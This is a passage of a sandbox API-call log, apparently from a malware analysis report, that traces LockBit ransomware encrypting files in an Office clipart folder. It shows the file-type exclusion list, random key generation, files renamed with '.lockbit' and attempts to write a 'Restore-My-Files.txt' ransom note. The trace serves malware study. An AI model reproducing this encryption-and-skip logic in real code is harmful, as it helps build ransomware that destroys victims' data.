0x753f0000 [0184.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0184.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0184.556] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0184.560] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.560] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.560] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.561] free (_Block=0x1fa2ed8) [0184.561] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.561] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.562] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x516, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02074_.GIF", cAlternateFileName="")) returned 1 [0184.562] lstrcmpiW (lpString1=".", lpString2="WB02074_.GIF") returned -1 [0184.562] lstrcmpiW (lpString1="..", lpString2="WB02074_.GIF") returned -1 [0184.562] PathFindExtensionW (pszPath="WB02074_.GIF") returned=".GIF" [0184.562] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.562] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.562] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.562] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.562] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.562] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.563] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.563] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.563] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.563] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.563] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.563] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.564] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.564] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02074_.GIF") returned -1 [0184.564] lstrcmpiW (lpString1="ntldr", lpString2="WB02074_.GIF") returned -1 [0184.564] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02074_.GIF") returned -1 [0184.564] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02074_.GIF") returned -1 [0184.564] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02074_.GIF") returned -1 [0184.564] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02074_.GIF") returned -1 [0184.564] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02074_.GIF") returned -1 [0184.564] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.564] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF") returned=".GIF" [0184.564] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.565] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.565] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.566] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.566] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF.lockbit") returned 85 [0184.566] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02074_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0184.567] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.567] malloc (_Size=0x40068) returned 0x3f70048 [0184.567] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=1302) returned 1 [0184.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0184.568] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0184.568] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0184.572] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.572] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.572] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.574] free (_Block=0x1fa2ed8) [0184.574] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.574] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.574] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02077_.GIF", cAlternateFileName="")) returned 1 [0184.574] lstrcmpiW (lpString1=".", lpString2="WB02077_.GIF") returned -1 [0184.574] lstrcmpiW (lpString1="..", lpString2="WB02077_.GIF") returned -1 [0184.574] PathFindExtensionW (pszPath="WB02077_.GIF") returned=".GIF" [0184.574] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.574] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.574] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.574] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.574] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.574] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.574] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.574] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.574] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.574] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.574] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.574] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.575] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.575] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.575] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.575] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.575] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.575] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.575] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.576] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.576] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02077_.GIF") returned -1 [0184.576] lstrcmpiW (lpString1="ntldr", lpString2="WB02077_.GIF") returned -1 [0184.576] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02077_.GIF") returned -1 [0184.576] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02077_.GIF") returned -1 [0184.576] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02077_.GIF") returned -1 [0184.576] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02077_.GIF") returned -1 [0184.576] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02077_.GIF") returned -1 [0184.576] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.576] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF") returned=".GIF" [0184.576] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.577] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.577] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.578] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.578] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.578] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.578] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.578] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF.lockbit") returned 85 [0184.578] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02077_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0184.579] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.579] malloc (_Size=0x40068) returned 0x3df0008 [0184.579] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=765) returned 1 [0184.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0184.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0184.580] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0184.584] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.584] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.584] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.585] free (_Block=0x1fa2ed8) [0184.585] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.585] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.585] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x996, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02082_.GIF", cAlternateFileName="")) returned 1 [0184.585] lstrcmpiW (lpString1=".", lpString2="WB02082_.GIF") returned -1 [0184.585] lstrcmpiW (lpString1="..", lpString2="WB02082_.GIF") returned -1 [0184.585] PathFindExtensionW (pszPath="WB02082_.GIF") returned=".GIF" [0184.586] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.586] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.586] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.587] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.587] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 